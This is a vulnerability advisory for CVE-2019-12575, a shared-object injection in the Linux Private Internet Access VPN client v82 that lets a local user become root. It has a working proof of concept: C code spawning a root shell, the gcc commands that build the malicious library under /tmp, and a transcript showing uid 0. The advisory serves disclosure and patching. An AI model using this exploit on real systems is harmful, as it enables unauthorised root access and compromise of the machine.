ASA-2019-00381 – London Trust Media Private Internet Access: Shared Object Injection


Allele Security Alert

ASA-2019-00381

Identifier(s)

ASA-2019-00381, CVE-2019-12575

Title

Shared Object Injection

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for Linux version v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for Linux version v1.2.1 or later

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA Linux binary root_runner.64 is setuid root. This binary executes /opt/pia/ruby/64/ruby which in turn attempts to load several libraries under /tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious library under this path to execute arbitrary code as the root user.

All steps are executed as a low privileged user.

Step 1 – Create the following directory

mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc

Step 2 – Create woot.c to execute a shell when loaded

cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF

Step 3 – Compile the malicious library.

gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
-shared \
-Wl,-soname,encdb.so.so \
-Wl,-init,woot \
-o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o

Step 4 – execute root_runner.64

/opt/pia/root_runner/root_runner.64

Example

user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#

Credits

Rich Mirch

Reference(s)

PIA Linux, macOS Privilege Escalation: Shared Object Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12575.txt

CVE-2019-12575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12575

CVE-2019-12575
https://nvd.nist.gov/vuln/detail/CVE-2019-12575

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.